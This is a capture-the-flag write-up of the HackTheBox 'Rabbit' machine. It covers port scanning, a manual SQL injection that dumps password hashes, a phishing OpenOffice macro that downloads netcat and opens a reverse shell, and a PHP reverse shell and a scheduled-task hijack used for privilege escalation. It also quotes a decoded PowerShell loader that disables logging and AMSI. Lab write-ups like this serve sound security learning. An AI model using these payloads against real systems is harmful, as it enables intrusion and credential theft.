HackTheBox- Rabbit Writeup

This week Rabbit retires on HTB, it’s one of my favorite boxes and after joining the Secjuice writing team, I decided to publish my first ever write-up.

HackTheBox- Rabbit Writeup

This week Rabbit retires on HTB, it’s one of my favorite boxes so I decided to publish my first ever write-up, I just joined the awesome Secjuice writing team and will keep publishing my various articles here. So, stay tuned! :)

Recon and Enumeration

Let’s start our enumeration with nmap. It’s always a good practice to do a full port scan to start with followed by a version scan. I usually go with nmap -p- --min-rate=1000 -T5 target . It’s good to complete scans for CTFs quickly, however, not a good technique to use in actual pentests.

~# nmap -p- -T5 --min-rate=1000 10.10.10.71 -oG rabbit.nmap

Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-17 13:55 IST
Warning: 10.10.10.71 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.71
Host is up (0.14s latency).
Not shown: 64584 closed ports, 901 filtered ports
PORT      STATE SERVICE
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
587/tcp   open  submission
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
808/tcp   open  ccproxy-http
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3306/tcp  open  mysql
5722/tcp  open  msdfsr
5985/tcp  open  wsman
6001/tcp  open  X11:1
6002/tcp  open  X11:2
6003/tcp  open  X11:3
6004/tcp  open  X11:4
6005/tcp  open  X11:5
6006/tcp  open  X11:6
6007/tcp  open  X11:7
6008/tcp  open  X11:8
6010/tcp  open  x11
6011/tcp  open  x11
6142/tcp  open  aspentec-lm
8080/tcp  open  http-proxy
9389/tcp  open  adws
43376/tcp open  unknown
43378/tcp open  unknown
43380/tcp open  unknown
43418/tcp open  unknown
43421/tcp open  unknown
43437/tcp open  unknown
43445/tcp open  unknown
43479/tcp open  unknown
43481/tcp open  unknown
43493/tcp open  unknown
43495/tcp open  unknown
43504/tcp open  unknown
43521/tcp open  unknown
43529/tcp open  unknown
43545/tcp open  unknown
43561/tcp open  unknown
47001/tcp open  winrm
64327/tcp open  unknown
64337/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 184.75 seconds

That’s a lot of ports, ain’t it!? Damn you lkys3n. Let’s go ahead and do a version scan. I’ll skip the lower >10k ports (because I like taking risks). ;)

# nmap -p $(grep -Eo '[0-9]{1,4}/open' rabbit.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.71

Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-17 14:09 IST
Completed NSE at 14:12, 0.57s elapsed
Nmap scan report for 10.10.10.71
Host is up (0.15s latency).
Scanned at 2018-08-17 14:09:19 IST for 192s

PORT     STATE  SERVICE           VERSION
25/tcp   open   smtp              Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.137], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: RABBIT
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: Rabbit.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
  ---------------------SNIP-------------------------

|_ssl-date: 2018-08-17T13:40:35+00:00; +4h59m59s from scanner time.
53/tcp   open   domain            Microsoft DNS 6.1.7601
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
80/tcp   open   http              Microsoft IIS httpd 7.5
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 403 - Forbidden: Access is denied.
88/tcp   open   kerberos-sec      Microsoft Windows Kerberos (server time: 2018-08-17 13:39:27Z)
135/tcp  open   msrpc             Microsoft Windows RPC
389/tcp  open   ldap              Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
443/tcp  open   ssl/http          Microsoft IIS httpd 7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| ssl-cert: Subject: commonName=Rabbit
 ---------------------------- SNIP------------------------
|_ssl-date: 2018-08-17T13:40:31+00:00; +4h59m59s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp  open   microsoft-ds?
464/tcp  open   kpasswd5?
587/tcp  open   smtp              Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.137], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: RABBIT
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: Rabbit.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
|_ssl-date: 2018-08-17T13:40:36+00:00; +4h59m59s from scanner time.
593/tcp  open   ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open   ldapssl?
808/tcp  open   ccproxy-http?
3268/tcp open   ldap              Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open   globalcatLDAPssl?
3306/tcp open   mysql             MySQL 5.7.19
|_mysql-info: ERROR: Script execution failed (use -d to debug)
3376/tcp closed cdbroker
3378/tcp closed wsicopy
3380/tcp closed sns-channels
3418/tcp closed rnmap
3421/tcp closed bmap
3437/tcp closed autocueds
3445/tcp closed monp
3479/tcp closed twrpc
3481/tcp closed cleanerliverc
3493/tcp closed nut
3495/tcp closed seclayer-tcp
3504/tcp closed ironstorm
3521/tcp closed mc3ss
3529/tcp closed jboss-iiop-ssl
3545/tcp closed camac
3561/tcp closed bmc-onekey
4327/tcp closed jaxer-web
4337/tcp closed unknown
5722/tcp open   msrpc             Microsoft Windows RPC
5985/tcp open   http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6001/tcp open   ncacn_http        Microsoft Windows RPC over HTTP 1.0
6002/tcp open   ncacn_http        Microsoft Windows RPC over HTTP 1.0
6003/tcp open   ncacn_http        Microsoft Windows RPC over HTTP 1.0
6004/tcp open   ncacn_http        Microsoft Windows RPC over HTTP 1.0
6005/tcp open   msrpc             Microsoft Windows RPC
6006/tcp open   msrpc             Microsoft Windows RPC
6007/tcp open   msrpc             Microsoft Windows RPC
6008/tcp open   msrpc             Microsoft Windows RPC
6010/tcp open   ncacn_http        Microsoft Windows RPC over HTTP 1.0
6011/tcp open   msrpc             Microsoft Windows RPC
6142/tcp open   msrpc             Microsoft Windows RPC
7001/tcp closed afs3-callback
8080/tcp open   http              Apache httpd 2.4.27 ((Win64) PHP/5.6.31)
|_http-favicon: Unknown favicon MD5: 79E32EEA338FA735AD22D36104C4337A
| http-methods:
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31
|_http-title: Example
9389/tcp open   mc-nmf            .NET Message Framing
Service Info: Hosts: Rabbit.htb.local, RABBIT; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m58s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 48647/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 54161/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 36588/udp): CLEAN (Timeout)
|   Check 4 (port 23183/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)

We get some info like the server’s FQDN, DNS, Netbios name etc.. So I’ll begin my recon from the web services (that’s the trend, right?) as the web is the best attack vector. However, I wasted a ton of time on the other rabbit holes like the .NET framing service, mysql bruteforce, smb etc..

The IIS on port 80 returns a 403 forbidden error and the IIS server on https has just the default IIS page. But Apache server on port 8080 seems interesting with a giant rabbit ASCII art (creepy 😣 ), so I start a dirsearch on port 443 and 8080.

# python3 dirsearch.py -u https://10.10.10.71/ -e aspx -f -t 20

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: aspx | Threads: 20 | Wordlist size: 441041

Error Log: /home/zadmin/Documents/wiz/dirsearch/logs/errors-18-08-17_14-29-45.log

Target: https://10.10.10.71/

[14:29:46] Starting: 
[14:29:52] 302 -  147B  - /public/  ->  https://10.10.10.71/owa/
[14:30:14] 302 -  147B  - /exchange/  ->  https://10.10.10.71/owa/
[14:30:30] 302 -  147B  - /Public/  ->  https://10.10.10.71/owa/
[14:31:24] 401 -   58B  - /rpc/
[14:31:58] 400 -   11B  - /%2Acheckout%2A.aspx
[14:32:41] 302 -    0B  - /owa/  ->  https://10.10.10.71/owa/auth/logon.aspx?url=https://10.10.10.71/owa/&reason=0

We see the directories redirected to /owa/ (Outlook web app) and also a /rpc/ directly with basic auth enabled (smells like another rabbit hole). Which I noted down for later.

# python3 dirsearch.py -u http://10.10.10.71:8080/ -e php -f -t 20

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 20 | Wordlist size: 441041

Error Log: /home/zadmin/Documents/wiz/dirsearch/logs/errors-18-08-17_14-27-54.log

Target: http://10.10.10.71:8080/

[14:27:55] Starting: 
[14:27:56] 403 -  306B  - /cgi-bin/
[14:27:59] 200 -   73KB - /icons/
[14:30:16] 403 -  300B  - /%20/
[14:31:45] 200 -    6KB - /joomla/
[14:32:13] 403 -  312B  - /%2Acheckout%2A.php
[14:32:13] 403 -  309B  - /%2Acheckout%2A/
[14:34:40] 302 -    0B  - /complain/  ->  /complain/login.php
[14:35:23] 403 -  309B  - /phpmyadmin/

We see a few more juicy folders here /cgi-bin/, /joomla/, /phpmyadmin/ as well as /complain/ . I felt /complain was the odd one out, so I proceeded to check it out (tbh I had wasted time on joomla using joomscan and even scanned /cgi-bin/ which was stupid, I know).

Exploiting SQLi in Complain Management System

Complain register page

Challenge: Guess the password.

The complain page had a register provision using which I registered a user and logged in. After logging in, I spent a while manually checking each parameter for SQLi but without any luck then I proceeded to download the source code and check the source for any vulnerabilities (which is how I did it initially), finally I came across the Id parameter in repo-detail.php

<?php
$id = $_GET['id'];
//echo $id;
?>
<h3>Report - Admin View</h3>
--------------------SNIP-------------------
<?php
        $sql = "SELECT *
                        FROM tbl_$id
                        LIMIT 0,20";
        $result = dbQuery($sql);
        $i=0;
        while($row = dbFetchRow($result)) {
        //extract($row);
-------------------SNIP---------------------

As you can see there’s no input sanitization which leads to an easy SQLi. After a while, my friend told me that there’s a CVE for the same which made me feel like a retard for not scrolling down while was googling.

If you like manual SQLi (like me) then this is a good exercise for you, so let’s get started. However, if you prefer SQLmap you can do it as mentioned here — https://www.exploit-db.com/exploits/41131/ and skip to the next section. All my queries are relative to the URL:

http://10.10.10.71:8080/complain/view.php?mod=admin&view=repod&id=[SQLi]

The query- id=engineer' throws an error

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’ LIMIT 0,20' at line 2

Next up we try to find the columns, as usual, I start from 10 until I stop getting any error- id=engineer order by 10-- throws an error , keep decrementing the value by 1 until you don’t see an error and at 7 you won’t see an error, that means there are 7 columns in the table.

Next we try to find the injectable column- id=engineer union all select 1,version(),3,user(),5,database(),7 --

You should see something similar to this-
SQLi

As you can see we got the output of version() which was in the 2nd column, so we’ll be using the 2nd column for our further queries.

Now let’s see all the schemas present id=engineer union all select 1,schema_name,3,4,5,6,7 from information_schema.schemata -- 

Which displays the names:

schemas

The secret schema catches my eye first (intuition?). Let’s check it out. I’ll be using the hex-encoded value of “secret” better than messing with quotes.

id=engineer union all select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=0x736563726574 --

Tables-in-secret-1

Now let’s check out the columns in it the table.

id=engineer union select all 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema=0x736563726574 and table_name=0x5573657273 --

Columns in user table

Awesome! Now for the last step, credsssssssssssssss ❤

id=engineer union select 1,concat(username,0x7c,password),3,4,5,6,7 from secret.users --

Dumped-user-table

There we have it :D . Users and hashes. Since I use a VM I won’t make it suffer from cracking md5 hashes :p , so I’ll just use Crackstation.

Cracked-hashes

Logging into OWA and Getting a Shell

There we go, thanks to Crackstation. Now let’s use these to login to OWA at https://10.10.10.71/owa/. I login as Ariel first. I see 3 emails in the inbox:

Mail one (Administrator)
Please send your weekly TPS reports to management ASAP!

Mail two(Administrator)
The security team has deployed windows defender and PowerShell constrain mode as the default organization security standard.

Mail three (Administrator)
There has been a change in the allowed software. Help Desk has moved forward with deploying Open Office to everyone.

Also, there were a few emails in the deleted items section most of which were Ariel being pissed at OWA (Microsoft yay!) for not delivering all emails, however, there was this mail from Admin.

Please send your weekly TPS reports to Raziel ASAP.

So after wasting some time (a lot) by using the creds to authenticate to all the million services running I came back to OWA and started searching about OpenOffice phishing and stuff and came across this module in metasploit exploit/multi/misc/openoffice_document_macro. But the module only created odt with powershell payload but as seen earlier there was a powershell constraint enabled on the server. So, after my failed Google attempts to find sources to generate odt with cmd payloads I downloaded OpenOffice and checked the file (you need to enable macros first).

Macros

So the powershell payload was just a one-liner command to download and execute a shell not something complex (Yes, I’m dumb). So changed it to:

cmd.exe /c certutil.exe  -f -split -urlcache  http://10.10.14.134/nc.exe C:\Windows\Temp\nc.exe && C:\Windows\Temp\nc.exe 10.10.14.134 443 -e cmd.exe 

Which just downloads nc.exe on the target and executes it. Then I sent the attachment to Raziel which we read about earlier.
mail

And then I waited…… for longgggggg time……. long as in watching a movie and returning (free vpn ftw!) and after countless attempts and digging up other rabbitholes meanwhile...

listening on [any] 443 ...
connect to [10.10.14.134] from rabbit.htb [10.10.10.71] 48538
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\OpenOffice 4\program>

I got a shell which died instantly. Anyway, after a few more tries I got a stable shell and the first flag.

Directory of C:\Users\Raziel\Desktop

11/13/2017  10:19 PM    <DIR>          .
11/13/2017  10:19 PM    <DIR>          ..
10/29/2017  10:07 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  25,645,821,952 bytes free

C:\Users\Raziel\Desktop> type user.txt
 type user.txt
---------Sorry bois, not today----------
C:\Users\Raziel\Desktop>

Onto NT AUTHORITY\SYSTEM

I usually follow this guide for privesc https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/ which is one of the best.After a bit of enumeration which any success I checked out the list of processes and their respective owners. You can use:

powershell -version 2 -c " & {Get-WmiObject -Query "'Select * from Win32_Process'" | where {$_.Name -notlike "'svchost*'"} | Select Name, Handle, @{Label="'Owner'";Expression={$_.GetOwner().User}} | ft -AutoSize }"

or wmic service where started=true get name, startname

-----------------------------SNIP--------------------
RemoteRegistry                       NT AUTHORITY\LocalService    
RpcEptMapper                         NT AUTHORITY\NetworkService  
RpcSs                                NT AUTHORITY\NetworkService  
SamSs                                LocalSystem                  
Schedule                             LocalSystem                  
SENS                                 LocalSystem                  
ShellHWDetection                     LocalSystem                  
Spooler                              LocalSystem                  
UxSms                                localSystem                  
vds                                  LocalSystem                  
VGAuthService                        LocalSystem                  
VMTools                              LocalSystem                  
VMware Physical Disk Helper Service  LocalSystem                  
VMwareCAFManagementAgentHost         LocalSystem                  
W32Time                              NT AUTHORITY\LocalService    
W3SVC                                LocalSystem                  
wampapache64                         LocalSystem                  
wampmysqld64                         LocalSystem                  
WAS                                  LocalSystem                  
WinHttpAutoProxySvc                  NT AUTHORITY\LocalService    
Winmgmt                              localSystem                  
WinRM                                NT AUTHORITY\NetworkService  
WPDBusEnum                           LocalSystem                  
wuauserv                             LocalSystem

Ha! Did you spot it? Both apache and mysql are running as root.

Privesc through Apache

We have write access to apache root in C:\wamp64\www

C:\wamp64\www>cacls .
cacls .
C:\wamp64\www NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F 
              BUILTIN\Administrators:(OI)(CI)(ID)F 
              BUILTIN\Users:(OI)(CI)(ID)R 
              BUILTIN\Users:(CI)(ID)(special        access:)
                                   FILE_APPEND_DATA
 
              BUILTIN\Users:(CI)(ID)(special access:)
                                    FILE_WRITE_DATA
 
              CREATOR OWNER:(OI)(CI)(IO)(ID)F

What are we waiting for? Let’s place a reverse php shell there.I used a stupid php script.

<?php
system('C:\Windows\Temp\nc.exe 10.10.14.134 53 -e cmd.exe');
?>

Admin-shell

Et Voila!

Privesc through Schtasks

During my enumeration, I came across this schtask “System Maintenance”.

C:\>schtasks /query /fo LIST 2>nul | findstr TaskName                                                                                                
schtasks /query /fo LIST 2>nul | findstr TaskName                                                                                                    
TaskName:      \CleanUp                                                                                                                              
TaskName:      \Delete Files                                                                                                                         
TaskName:      \Delete Sent Items Ariel                                                                                                              
TaskName:      \Delete Sent Items Kain                                                                                                               
TaskName:      \Delete Sent Items Magnus                                                                                                             
TaskName:      \Download Email Attachments                                                                                                           
TaskName:      \Execute Malicious Documents                                                                                                          
TaskName:      \System Maintenance                                                                                                                   
--------------------------SNIP-------------------

After I got root, I decided to check it out.

C:\>schtasks /query /v /fo list /tn "\System Maintenance"                                                                                            
schtasks /query /v /fo list /tn "\System Maintenance"                                                                                                
                                                                                                                                                     
Folder: \                                                                                                                                            
HostName:                             RABBIT                                                                                                         
TaskName:                             \System Maintenance                                                                                            
Next Run Time:                        8/18/2018 5:42:55 PM                                                                                           
Status:                               Ready                                                                                                          
Logon Mode:                           Interactive only                                                                                               
Last Run Time:                        8/18/2018 4:42:14 PM                                                                                           
Last Result:                          0                                                                                                              
Author:                               HTB\Administrator                                                                                              
Task To Run:                          cmd.exe /c C:\Users\Raziel\AppData\Local\Temp\xyz\test.bat                                                     
Start In:                             N/A                                                                                                            
Comment:                              N/A                                                                                                            
Scheduled Task State:                 Enabled                                                                                                        
Idle Time:                            Disabled                                                                                                       
Power Management:                     Stop On Battery Mode, No Start On Batteries                                                                    
Run As User:                          HTB\Raziel                                                                                                     
Delete Task If Not Rescheduled:       Enabled                                                                                                        
Stop Task If Runs X Hours and X Mins: Disabled                                                                                                       
Schedule:                             Scheduling data is not available in this format.                                                               
Schedule Type:                        Daily                                                                                                          
Start Time:                           12:00:00 PM                                                                                                    
Start Date:                           11/16/2017                                                                                                     
End Date:                             N/A                                                                                                            
Days:                                 Every 1 day(s)                                                                                                 
Months:                               N/A                                                                                                            
Repeat: Every:                        1 Hour(s), 0 Minute(s)                                                                                         
Repeat: Until: Time:                  None                                                                                                           
Repeat: Until: Duration:              Disabled                                                                                                       
Repeat: Stop If Still Running:        Disabled

Interesting the author is Administrator. Let’s see what the file contents are-

powershell -version 2 -exec bypass -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVgBFAHIAUwBpAG8AbgBUAEEAQgBMAGUALgBQAFMAVgBlAFIAUwBJAG8AbgAuAE0AYQBKAG8AUgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAEYAXQAuAEEAcwBTAGUAbQBiAGwAWQAuAEcAZQB0AFQAeQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAdABGAGkAZQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAWABv
------------SNIP------------
AFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgA6ADQANAAzACcAOwAkAHQAPQAnAC8AYQBkAG0AaQBuAC8AZwBlAHQALgBwAGgAcAAnADsAJABXAGMALgBIAGUAYQBEAGUAUgBTAC4AQQBEAEQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHMAZQBzAHMAaQBvAQQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA

Woah! A base64 encoded powershell command which reduces to this,

IF($PSVErSionTABLe.PSVeRSIon.MaJoR -GE 3){$GPF=[rEF].AsSemblY.GetTyPe('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GEtValuE($NUlL);If($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VAl=[CoLLECTIons.GENERIc.DictiONArY[STRiNG,SyStEM.ObJeCt]]::New();$vAl.ADd('EnableScriptB'+'lockLogging',0);$VAl.ADD('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$val}ELSE{[SCriPTBlOck]."GeTFiE`Ld"('signatures','N'+'onPublic,Static').SeTVAlUE($NUlL,(NeW-OBJECt COLlecTioNs.GeNErIC.HASHSet[STrINg]))}[REf].ASsEmBLy.GEtTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFIelD('amsiInitFailed','NonPublic,Static').SetVALuE($NulL,$TruE)};};[SySteM.NET.SERVIcEPoINtMANaGER]::ExpECt100COntInUE=0;$wc=New-ObJECT SySTeM.Net.WEbCLieNT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$Wc.HEaDErs.Add('User-Agent',$u);$WC.ProXY=[SYsTeM.NET.WebREQUEst]::DEfAultWebProXy;$WC.PRoXy.CReDEnTialS = [SYstEm.NeT.CreDEntIaLCache]::DeFAuLTNeTwORKCredeNTials;$Script:Proxy = $wc.Proxy;$K=[SysTeM.TexT.EncOdInG]::ASCII.GeTBYTes('x6yd57j*0|QvlZwkBOIrmMs_#)t{!X-L');$R={$D,$K=$ARGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUnt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXoR$S[($S[$I]+$S[$H])%256]}};$ser='http://10.10.14.2:443';$t='/admin/get.php';$Wc.HeaDeRS.ADD("Cookie","session=Gki9ETjK1a2y70BsQD8O4qz4TBY=");$daTA=$WC.DOWNloADData($ser+$t);$iV=$datA[0..3];$DATA=$data[4..$datA.leNGTH];-join[ChAR[]](& $R $DAtA ($IV+$K))|IEX

After wasting some time on it I realized it’s just another rabbit hole. However, when I tried to run the schtask it made an attempt to run that means the task was set to run with highest privileges. So I’ll be able to bypass UAC using the schtask. I added an nc shell to the test.bat file and ran the task which gave me a shell with highest privs.

C:\Users\Raziel\AppData\Local\Temp\xyz>echo cmd.exe /c C:\Users\Raziel\AppData\Local\Temp\xyz\nc.exe 10.10.14.134 53 -e cmd.exe > test.bat
echo cmd.exe /c C:\Users\Raziel\AppData\Local\Temp\xyz\nc.exe 10.10.14.134 53 -e cmd.exe > test.bat

C:\Users\Raziel\AppData\Local\Temp\xyz>schtasks /run /tn "System Maintenance"
schtasks /run /tn "System Maintenance"
SUCCESS: Attempted to run the scheduled task "System Maintenance".

C:\Users\Raziel\AppData\Local\Temp\xyz>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

Getting the shell as raziel….

C:\Users\Administrator\Desktop>whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                                                    State
=============================== ============================================================== ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process                             Disabled
SeMachineAccountPrivilege       Add workstations to domain                                     Disabled
SeSecurityPrivilege             Manage auditing and security log                               Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects                       Disabled
SeLoadDriverPrivilege           Load and unload device drivers                                 Disabled
SeSystemProfilePrivilege        Profile system performance                                     Disabled
SeSystemtimePrivilege           Change the system time                                         Disabled
SeProfileSingleProcessPrivilege Profile single process                                         Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority                                   Disabled
SeCreatePagefilePrivilege       Create a pagefile                                              Disabled
SeBackupPrivilege               Back up files and directories                                  Disabled
SeRestorePrivilege              Restore files and directories                                  Disabled
SeShutdownPrivilege             Shut down the system                                           Disabled
SeDebugPrivilege                Debug programs                                                 Disabled
SeSystemEnvironmentPrivilege    Modify firmware environment values                             Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                                       Enabled
SeRemoteShutdownPrivilege       Force shutdown from a remote system                            Disabled
SeUndockPrivilege               Remove computer from docking station                           Disabled
SeEnableDelegationPrivilege     Enable computer and user accounts to be trusted for delegation Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks                               Disabled
SeImpersonatePrivilege          Impersonate a client after authentication                      Enabled
SeCreateGlobalPrivilege         Create global objects                                          Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set                                 Disabled
SeTimeZonePrivilege             Change the time zone                                           Disabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                                          Disabled

C:\Users\Administrator\Desktop>whoami  
whoami
htb\raziel

C:\Users\Administrator\Desktop>type root.txt
type root.txt
---------------------NOPE-------------------------
C:\Users\Administrator\Desktop>

So, that’s it. Let know how my first write-up was in the comments section.

You can find me at — https://www.hackthebox.eu/home/users/profile/8308 or on matter most https://chat.netsecfocus.com.

The artwork used to head this article is called 'Halfone Rabbit' and it was created by Retro Supply.